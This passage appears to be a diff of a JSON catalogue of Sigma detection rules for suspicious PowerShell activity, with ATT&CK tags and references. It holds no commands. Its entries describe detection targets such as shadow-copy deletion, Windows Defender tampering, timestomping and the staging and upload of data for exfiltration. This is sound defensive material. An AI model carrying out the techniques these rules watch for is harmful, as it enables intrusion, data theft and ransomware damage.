suspicious PowerShell invocation command parameters", - "uuid": "ed965133-513f-41d9-a441-e38076a0798f", - "value": "Suspicious PowerShell Invocations - Generic", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/12", - "filename": "posh_ps_susp_invocation_generic.yml", - "author": "Florian Roth (rule)", - "level": "high", - "falsepositive": [ - "Very special / sneaky PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious PowerShell invocation command parameters", - "uuid": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", - "value": "Suspicious PowerShell Invocations - Specific", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/05", - "filename": "posh_ps_susp_invocation_specific.yml", - "author": "Florian Roth (rule), Jonhnathan Ribeiro", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n", - "uuid": "d4488827-73af-4f8d-9244-7b7662ef046e", - "value": "Change User Agents with WebRequest", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2022/01/23", - "filename": "posh_ps_susp_invoke_webrequest_useragent.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", - "uuid": "70ad982f-67c8-40e0-a955-b920c2fa05cb", - "value": "Suspicious IO.FileStream", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1006/T1006.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_iofilestream.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.003" - ], - "creation_date": "2022/01/09", - "filename": "posh_ps_susp_iofilestream.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", - "uuid": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", - "value": "Suspicious PowerShell Keywords", - "meta": { - "refs": [ - "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462", - "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1", - "https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1", - "https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/02/11", - "filename": "posh_ps_susp_keywords.yml", - "author": "Florian Roth, Perez Diego (@darkquassar)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", - "uuid": "fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb", - "value": "Suspicious Get Local Groups Information - PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_local_group_reco.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ], - "creation_date": "2021/12/12", - "filename": "posh_ps_susp_local_group_reco.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", - "uuid": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", - "value": "Powershell Local Email Collection", - "meta": { - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1114.001/T1114.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mail_acces.yml" - ], - "tags": [ - "attack.collection", - "attack.t1114.001" - ], - "creation_date": "2021/07/21", - "filename": "posh_ps_susp_mail_acces.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", - "uuid": "66a4d409-451b-4151-94f4-a55d559c49b0", - "value": "PowerShell Deleted Mounted Share", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.005" - ], - "creation_date": "2020/10/08", - "filename": "posh_ps_susp_mounted_share_deletion.yml", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", - "level": "medium", - "falsepositive": [ - "Administrators or Power users may remove their shares via cmd line" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", - "uuid": "29e1c216-6408-489d-8a06-ee9d151ef819", - "value": "Suspicious Mount-DiskImage", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image", - 
"https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.005" - ], - "creation_date": "2022/02/01", - "filename": "posh_ps_susp_mount_diskimage.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.\nWithout knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism\n", - "uuid": "1883444f-084b-419b-ac62-e0d0c5b3693f", - "value": "Suspicious Connection to Remote Account", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.001/T1110.001.md#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_networkcredential.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110.001" - ], - "creation_date": "2021/12/27", - "filename": "posh_ps_susp_networkcredential.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). 
The adversary may then perform actions as the logged-on user.", - "uuid": "1c563233-030e-4a07-af8c-ee0490a66d3a", - "value": "Suspicious New-PSDrive to Admin Share", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-2---map-admin-share-powershell", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_new_psdrive.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2022/08/13", - "filename": "posh_ps_susp_new_psdrive.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", - "uuid": "bd33d2aa-497e-4651-9893-5c5364646595", - "value": "Suspicious TCP Tunnel Via PowerShell Script", - "meta": { - "refs": [ - "https://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090" - ], - "creation_date": "2022/07/08", - "filename": "posh_ps_susp_proxy_scripts.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", - "uuid": "a9723fcc-881c-424c-8709-fd61442ab3c3", - "value": "Recon Information for Export with PowerShell", - "meta": 
{ - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_recon_export.yml" - ], - "tags": [ - "attack.collection", - "attack.t1119" - ], - "creation_date": "2021/07/30", - "filename": "posh_ps_susp_recon_export.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", - "uuid": "48a45d45-8112-416b-8a67-46e03a4b2107", - "value": "Remove Account From Domain Admin Group", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1531/T1531.md#atomic-test-3---remove-account-from-domain-admin-group", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml" - ], - "tags": [ - "attack.impact", - "attack.t1531" - ], - "creation_date": "2021/12/26", - "filename": "posh_ps_susp_remove_adgroupmember.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", - "uuid": "22d80745-6f2c-46da-826b-77adaededd74", - "value": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", - "meta": { - "refs": [ - "https://twitter.com/Alh4zr3d/status/1580925761996828672", - "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" - ], - "creation_date": "2022/10/24", - "filename": "posh_ps_susp_service_dacl_modification_set_service.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Rare intended use of hidden services", - "Rare FP could occure due to the non linearity of the ScriptBlockText log" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as\na precursor for Collection and to identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", - "uuid": "95f0643a-ed40-467c-806b-aac9542ec5ab", - "value": "Suspicious Get Information for SMB Share", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ], - "creation_date": "2021/12/15", - "filename": "posh_ps_susp_smb_share_reco.yml", - "author": "frack113", - "level": "low", - 
"falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.", - "uuid": "195626f3-5f1b-4403-93b7-e6cfd4d6a078", - "value": "Suspicious SSL Connection", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2", - "https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1573" - ], - "creation_date": "2022/01/23", - "filename": "posh_ps_susp_ssl_keyword.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Legitimate administrative script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Powershell use PassThru option to start in background", - "uuid": "0718cd72-f316-4aa2-988f-838ea8533277", - "value": "Suspicious Start-Process PassThru", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003" - ], - "creation_date": "2022/01/15", - "filename": "posh_ps_susp_start_process.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - 
"logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", - "uuid": "5947497f-1aa4-41dd-9693-c9848d58727d", - "value": "Suspicious Unblock-File", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_unblock_file.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.005" - ], - "creation_date": "2022/02/01", - "filename": "posh_ps_susp_unblock_file.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.\nThis may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper\n", - "uuid": "c5ac6a1e-9407-45f5-a0ce-ca9a0806a287", - "value": "Replace Desktop Wallpaper by Powershell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1491.001/T1491.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_wallpaper.yml" - ], - "tags": [ - "attack.impact", - "attack.t1491.001" - ], - "creation_date": "2021/12/26", - "filename": "posh_ps_susp_wallpaper.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - 
"logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.", - "uuid": "b26647de-4feb-4283-af6b-6117661283c5", - "value": "Powershell Suspicious Win32_PnPEntity", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1120/T1120.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1120" - ], - "creation_date": "2021/08/23", - "filename": "posh_ps_susp_win32_pnpentity.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Admin script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "uuid": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", - "value": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ], - "creation_date": "2021/12/26", - "filename": "posh_ps_susp_win32_shadowcopy.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "uuid": "c1337eb8-921a-4b59-855b-4ba188ddcc42", - "value": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", - "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ], - "creation_date": "2022/09/20", - "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml", - "author": "Tim Rauch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", - "uuid": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", - "value": "Suspicious PowerShell WindowStyle Option", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_windowstyle.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.003" - ], - "creation_date": "2021/10/20", - "filename": "posh_ps_susp_windowstyle.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the \"Write-EventLog\" cmdlet with 
'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", - "uuid": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", - "value": "PowerShell Write-EventLog Usage", - "meta": { - "refs": [ - "https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/08/16", - "filename": "posh_ps_susp_write_eventlog.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "uuid": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", - "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_zip_compress.yml" - ], - "tags": [ - "attack.collection", - "attack.t1074.001" - ], - "creation_date": "2021/07/20", - "filename": "posh_ps_susp_zip_compress.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", - "uuid": "dddfebae-c46f-439c-af7a-fdb6bde90218", - "value": "SyncAppvPublishingServer Execution to Bypass Powershell 
Restriction", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2020/10/05", - "filename": "posh_ps_syncappvpublishingserver_exe.yml", - "author": "Ensar \u015eamil, @sblmsrsn, OSCD Community", - "level": "medium", - "falsepositive": [ - "App-V clients" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", - "uuid": "14c71865-6cd3-44ae-adaa-1db923fae5f2", - "value": "Tamper Windows Defender - ScriptBlockLogging", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", - "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/01/16", - "filename": "posh_ps_tamper_defender.yml", - "author": "frack113, elhoim", - "level": "high", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "uuid": "ae2bdd58-0681-48ac-be7f-58ab4e593458", - "value": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", - "meta": { - "refs": [ - 
"https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender_remove_mppreference.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/08/05", - "filename": "posh_ps_tamper_defender_remove_mppreference.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", - "uuid": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", - "value": "Testing Usage of Uncommonly Used Port", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell", - "https://docs.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_test_netconnection.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1571" - ], - "creation_date": "2022/01/23", - "filename": "posh_ps_test_netconnection.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate administrative script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the 
modify, access, create, and change times), often to mimic files that are in the same folder.\n", - "uuid": "c6438007-e081-42ce-9483-b067fbef33c3", - "value": "Powershell Timestomp", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", - "https://www.offensive-security.com/metasploit-unleashed/timestomp/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_timestomp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.006" - ], - "creation_date": "2021/08/03", - "filename": "posh_ps_timestomp.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate admin script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.", - "uuid": "05b3e303-faf0-4f4a-9b30-46cc13e69152", - "value": "Powershell Trigger Profiles by Add_Content", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_trigger_profiles.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1546.013" - ], - "creation_date": "2021/08/18", - "filename": "posh_ps_trigger_profiles.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command", - "uuid": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", - "value": "Windows PowerShell Upload Web Request", - "meta": { - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md", - "https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_upload.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1020" - ], - "creation_date": "2022/01/07", - "filename": "posh_ps_upload.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", - "uuid": "c2993223-6da8-4b1a-88ee-668b8bf315e9", - "value": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell", - "meta": { - "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033" - ], - "creation_date": "2022/11/17", - "filename": "posh_ps_user_discovery_get_aduser.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to 